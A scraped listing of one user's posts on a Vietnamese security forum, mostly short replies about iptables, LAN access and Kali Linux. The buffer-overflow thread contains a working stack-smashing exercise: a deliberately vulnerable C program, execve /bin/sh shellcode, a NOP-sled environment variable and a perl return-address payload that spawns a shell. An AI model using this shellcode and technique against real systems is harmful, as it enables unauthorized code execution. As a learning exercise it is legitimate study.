<![CDATA[Messages posted by "qwerty13"]]> /hvaonline/posts/listByUser/273010.html JForum - http://www.jforum.net góp ý về việc share tool hacking /hvaonline/posts/preList/45711/281391.html#281391 /hvaonline/posts/preList/45711/281391.html#281391 GMT Lớp học Hacking - Scriptkiddies class

counter89 wrote:
cho e tham gia với bác mọi tài liệu gửi về taovps15@gmail.com , rất mong sự giúp đở từ bác 
Ai rảnh mà đi gửi cho bạn. Muốn học thì trước hết hãy đọc kĩ topic này đi đã nhé. Có 3 cách học như đã nói, 1 là lên trang scriptkidy.com, 2 là lên youtube của xnohat, 3 là lên diễn đàn để ý topic nào có chữ Script kidy ở đầu.]]>
/hvaonline/posts/preList/45425/281198.html#281198 /hvaonline/posts/preList/45425/281198.html#281198 GMT
Hỗ trợ khẩn cấp về mạng internet giúp em, các mem ơi? /hvaonline/posts/preList/45725/281106.html#281106 /hvaonline/posts/preList/45725/281106.html#281106 GMT hỏi về mạng lan, ping /hvaonline/posts/preList/45721/281071.html#281071 /hvaonline/posts/preList/45721/281071.html#281071 GMT Iptables cho mạng LAN /hvaonline/posts/preList/45712/281061.html#281061 /hvaonline/posts/preList/45712/281061.html#281061 GMT tìm site lỗi !! /hvaonline/posts/preList/45708/281004.html#281004 /hvaonline/posts/preList/45708/281004.html#281004 GMT Muốn trở thành hacker mũ trắng /hvaonline/posts/preList/45689/280895.html#280895 /hvaonline/posts/preList/45689/280895.html#280895 GMT Giúp em giải đáp thắc mắc trong phòng đọc về bài iptables /hvaonline/posts/preList/45673/280823.html#280823 /hvaonline/posts/preList/45673/280823.html#280823 GMT Giúp bố trí mô hình demo firewall iptables /hvaonline/posts/preList/37997/280777.html#280777 /hvaonline/posts/preList/37997/280777.html#280777 GMT Lớp học Hacking - Scriptkiddies class /hvaonline/posts/preList/45425/280776.html#280776 /hvaonline/posts/preList/45425/280776.html#280776 GMT Không xóa được file trong Linux /hvaonline/posts/preList/45661/280774.html#280774 /hvaonline/posts/preList/45661/280774.html#280774 GMT Lớp học Hacking - Scriptkiddies class /hvaonline/posts/preList/45425/280773.html#280773 /hvaonline/posts/preList/45425/280773.html#280773 GMT Tấn công DDoS trong mạng LAN

josdtt99 wrote:
backtrack đi bạn ơi! 
Backtrack? "Backtrack đi bạn ơi" là thế nào? Backtrack có cả trăm tools bảo người ta dùng backtrack nhưng k bảo dùng như nào, dùng cái gì để đạt được mục đích thì bảo làm gì? Lại kiểu biết 1 tí về hack, nghe lỏm được hack thì dùng backtrack, thế là vào comment "backtrack đi bạn ơi!" như đúng rồi.]]>
/hvaonline/posts/preList/44518/280772.html#280772 /hvaonline/posts/preList/44518/280772.html#280772 GMT
Nhờ HVA giúp đỡ việc này. /hvaonline/posts/preList/36428/280484.html#280484 /hvaonline/posts/preList/36428/280484.html#280484 GMT Cài webserver trên centos 5 bị lỗi

trjeunguyen wrote:

kakarottbatdong wrote:

trjeunguyen wrote:
Anh ơi cho em hỏi thêm là nếu em không tắt cái iptables đó thì có cách nào em dùng máy khác truy cập vào máy chủ web được không anh. 
Không phải là tắt, nếu không rành thì Del hết rule trên đó, cho CHAIN INPUT và OUTPUT ==> ACCEPT Nếu iptables DROP port 80 thì truy cập máy chủ web port 80 bằng niềm tin à. 
Cám ơn anh, mai em báo cáo rồi mà bây giờ không viết được cái rule, chắc die quá 
Trời ơi iptables -h 1 phát là ra cả đống manual đó, hoặc không thì google @@ Em thấy khó hiểu mỗi cái rule của iptables còn không tự mò mẫm được thì theo ngành tin kiểu gì @@]]>
/hvaonline/posts/preList/45588/280483.html#280483 /hvaonline/posts/preList/45588/280483.html#280483 GMT
Kali linux (backtrack 6)

kienmanowar wrote:

qwerty13 wrote:
Thay vì hỏi thì tại sao bạn không tự google nhỉ -.- Ngay trên trang chủ cũng có nói, google thì cả trăm bài, tại sao bạn không tự đi tìm? 
Đó là "bệnh" không chữa nổi :D 
Em từ trước đến giờ sách học lớn nhất vẫn là anh google :-) Chủ yếu là biết chọn lọc xử lí không thôi ;)

graycap wrote:
e có vùa hỏi + vừa tìm =)) nói chung là ok rồi 
Mình nghĩ bạn nên tìm trước, không ra rồi mới đi hỏi ;)]]>
/hvaonline/posts/preList/45581/280412.html#280412 /hvaonline/posts/preList/45581/280412.html#280412 GMT
Kali linux (backtrack 6) /hvaonline/posts/preList/45581/280385.html#280385 /hvaonline/posts/preList/45581/280385.html#280385 GMT Truy cập vào máy tính qua mạng Internet khi có địa chỉ IP?

kiichi123 wrote:
em thấy biết đc ip public nhưng trong là mạng LAN có nhiều địa chỉ private thì làm thế nào để vào được ạ, em là newbie nên ko biết nhiều mong các anh chỉ dạy thêm cho. 
Để vào được thì bạn cần vào router, setup NAT cho 1 cổng nhất định của 1 địa chỉ IP nhất định trong mạng LAN.]]>
/hvaonline/posts/preList/35169/280151.html#280151 /hvaonline/posts/preList/35169/280151.html#280151 GMT
Bảo mật cho phần mềm chống crack /hvaonline/posts/preList/45512/280150.html#280150 /hvaonline/posts/preList/45512/280150.html#280150 GMT Bắt gói tin bằng wifi adapter trong mạng LAN /hvaonline/posts/preList/45513/280065.html#280065 /hvaonline/posts/preList/45513/280065.html#280065 GMT Tự học lập trình web cân những gì? /hvaonline/posts/preList/45448/279799.html#279799 /hvaonline/posts/preList/45448/279799.html#279799 GMT HĐH UNIX và LINUX /hvaonline/posts/preList/45428/279627.html#279627 /hvaonline/posts/preList/45428/279627.html#279627 GMT hack wpa /hvaonline/posts/preList/45423/279626.html#279626 /hvaonline/posts/preList/45423/279626.html#279626 GMT Sau khi lấy được pass rồi thì cách dịch ra như thế nào? /hvaonline/posts/preList/45400/279454.html#279454 /hvaonline/posts/preList/45400/279454.html#279454 GMT Giúp mình xâm nhập máy tính với /hvaonline/posts/preList/45371/279326.html#279326 /hvaonline/posts/preList/45371/279326.html#279326 GMT Hỏi về buffer overflow /hvaonline/posts/preList/45339/279197.html#279197 /hvaonline/posts/preList/45339/279197.html#279197 GMT Hỏi về buffer overflow Code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) 
{
        char *ptr;

        if(argc < 3) {
                printf("Usage: %s <environment var> <target program name>\n", argv[0]);
                exit(0);
        }

        ptr = getenv(argv[1]);                           /* Get env var location. */
        ptr += (strlen(argv[0]) - strlen(argv[2]))*2;    /* Adjust for program name. */

        printf("%s will be at %p\n", argv[1], ptr);

        return 0;
}
Tuy nhiên mỗi lần chạy thì kết quả lại khác nhau. Có phải đây là do ASLR của linux không ạ?]]>
/hvaonline/posts/preList/45339/279186.html#279186 /hvaonline/posts/preList/45339/279186.html#279186 GMT
Hỏi về buffer overflow Code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void foo(char *mes)
{
	char buf[20];

	strcpy(buf, mes);
}

int main(int argc, char **argv)
{
	if (argc != 2) {
		printf("Usage: %s <string>\n", argv[0]);
		exit(1);
	}

	foo(argv[1]);

	return 0;
}
Compile: Code:
gcc -z execstack -fno-stack-protector -Wall -g overflow.c -o overflow
strcpy ở chương trình trên sẽ gây ra buffer overflow. Em thử khai thác: Code:
(gdb) disass main
Dump of assembler code for function main:
   0x08048496 <+0>:	push   ebp
   0x08048497 <+1>:	mov    ebp,esp
   0x08048499 <+3>:	and    esp,0xfffffff0
   0x0804849c <+6>:	sub    esp,0x10
   0x0804849f <+9>:	cmp    DWORD PTR [ebp+0x8],0x2
   0x080484a3 <+13>:	je     0x80484c6 <main+48>
   0x080484a5 <+15>:	mov    eax,DWORD PTR [ebp+0xc]
   0x080484a8 <+18>:	mov    eax,DWORD PTR [eax]
   0x080484aa <+20>:	mov    DWORD PTR [esp+0x4],eax
   0x080484ae <+24>:	mov    DWORD PTR [esp],0x8048570
   0x080484b5 <+31>:	call   0x8048330 <printf@plt>
   0x080484ba <+36>:	mov    DWORD PTR [esp],0x1
   0x080484c1 <+43>:	call   0x8048360 <exit@plt>
   0x080484c6 <+48>:	mov    eax,DWORD PTR [ebp+0xc]
   0x080484c9 <+51>:	add    eax,0x4
   0x080484cc <+54>:	mov    eax,DWORD PTR [eax]
   0x080484ce <+56>:	mov    DWORD PTR [esp],eax
   0x080484d1 <+59>:	call   0x804847c <foo>
   0x080484d6 <+64>:	mov    eax,0x0
   0x080484db <+69>:	leave  
   0x080484dc <+70>:	ret    
End of assembler dump.
Code:
(gdb) break 10
Breakpoint 1 at 0x8048494: file overflow.c, line 10.
(gdb) run AAAA
Starting program: /home/quan/bt/btc/shellcode/overflow AAAA

Breakpoint 1, foo (mes=0xbffff427 "AAAA") at overflow.c:10
10	}
(gdb) i r esp ebp
esp            0xbffff160	0xbffff160
ebp            0xbffff198	0xbffff198
(gdb) x/20xw $esp
0xbffff160:	0xbffff17c	0xbffff427	0xbffff402	0xb7fc0000
0xbffff170:	0x080484e0	0x08048380	0x00000000	0x41414141
0xbffff180:	0xb7fc0300	0x00000002	0x0804a000	0x08048532
0xbffff190:	0x00000002	0xbffff254	0xbffff1b8	0x080484d6
0xbffff1a0:	0xbffff427	0x00000000	0x080484eb	0xb7fc0000
(gdb) cont
Continuing.
[Inferior 1 (process 3161) exited normally]
Như vậy có thể thấy vị trí của return address là 0xbffff19c, vị trí của buf là 0xbffff17c. Ta sẽ cần 36 bytes để overwrite return address. Em dự định sẽ đặt shellcode vào 1 biến env là EGG cùng với 200 bytes NOP sled. Đây là đoạn mã assembly em dùng làm shellcode: Code:
BITS 32

; execve(const char *filename, char *const argv[], char *const envp[])
xor eax, eax
push eax
push 0x68732f2f		; Push "//sh" to the stack. 
push 0x6e69622f		; Push "/bin" to the stack.
mov ebx, esp
push eax
mov ecx, esp
push eax
mov edx, esp
mov al, 11
int 0x80
Bây giờ em tìm địa chỉ của biến EGG: Code:
quan@quantran:~/bt/btc/shellcode$ nasm shell.s
quan@quantran:~/bt/btc/shellcode$ export EGG=$(perl -e 'print "\x90"x200')$(cat shell)
quan@quantran:~/bt/btc/shellcode$ gdb -q ./overflow
Reading symbols from /home/quan/bt/btc/shellcode/overflow...done.
(gdb) break main
Breakpoint 1 at 0x804849f: file overflow.c, line 14.
(gdb) run
Starting program: /home/quan/bt/btc/shellcode/overflow 

Breakpoint 1, main (argc=1, argv=0xbffff174) at overflow.c:14
14		if (argc != 2) {
(gdb) x/30s $esp + 0x260
...
0xbffff4f1:	"EGG=", '\220' <repeats 196 times>...
0xbffff5b9:	"\220\220\220\220\061\300Ph//shh/bin\211\343P\211\341P\211\342\260\v̀"
...
(gdb) cont
Continuing.
Usage: /home/quan/bt/btc/shellcode/overflow <string>
[Inferior 1 (process 3729) exited with code 01]
(gdb) quit
quan@quantran:~/bt/btc/shellcode$
Ta có thể thấy biến EGG nằm ở 0xbffff4f1. Khi chạy chương trình có thể địa chỉ sẽ khác đi 1 chút, tuy nhiên em nghĩ với 200 bytes NOP sled thì sẽ không vấn đề gì. Như vậy em sẽ dùng địa chỉ 0xbffff550 để overwrite return address. Code:
quan@quantran:~/bt/btc/shellcode$ ./overflow $(perl -e 'print "\x90"x32 . "\x50\xf5\xff\xbf"')
Segmentation fault (core dumped)
quan@quantran:~/bt/btc/shellcode$ gdb -q ./overflow
Reading symbols from /home/quan/bt/btc/shellcode/overflow...done.
(gdb) run $(perl -e 'print "\x90"x32 . "\x50\xf5\xff\xbf"')
Starting program: /home/quan/bt/btc/shellcode/overflow $(perl -e 'print "\x90"x32 . "\x50\xf5\xff\xbf"')
process 3810 is executing new program: /bin/dash
$ ls
Makefile  aa.c	helloworld  helloworld.s  overflow  overflow.c	shell  shell.s	test  test.c
$ 
[Inferior 1 (process 3810) exited normally]
(gdb) quit
quan@quantran:~/bt/btc/shellcode$ ./overflow $(perl -e 'print "\x90"x32 . "\x50\xf5\xff\xbf"')
Segmentation fault (core dumped)
Khi chạy ở ngoài thì bị segfault, tuy nhiên khi chạy ở gdb thì lại được??? Tại sao lại thế ạ? Liệu các biến môi trường có bị disable theo 1 cách nào đó không khi chương trình chạy ở ngoài? Sự khác biệt giữa chạy trong gdb với chạy ở ngoài là gì ạ? Em cảm ơn trước ạ :) P/s: Em vừa ngồi thử lại xong và bây giờ thì cả trong gdb cũng bị segfault. Pro Police đã bị disable, stack thì executable, shellcode đúng, vậy thì tại sao lại bị segfault ạ?]]>
/hvaonline/posts/preList/45339/279179.html#279179 /hvaonline/posts/preList/45339/279179.html#279179 GMT
Xâm nhập mọi máy tính 32bit và 64bit

mylove14129 wrote:

meoit wrote:

mylove14129 wrote:
Để mình cho bạn cái ip(public) và làm ơn 'xâm nhập' vào cái máy ấy giúp mình nhé. 
Mình ko biết về xâm nhập IP ^^ . 
Nghe câu trả lời là hiểu.  
Đồng ý với bạn này. Internet mà không biết IP thì bạn "xâm nhập" kiểu gì? ]]>
/hvaonline/posts/preList/45238/278780.html#278780 /hvaonline/posts/preList/45238/278780.html#278780 GMT
xin hỏi về cain /hvaonline/posts/preList/45101/278226.html#278226 /hvaonline/posts/preList/45101/278226.html#278226 GMT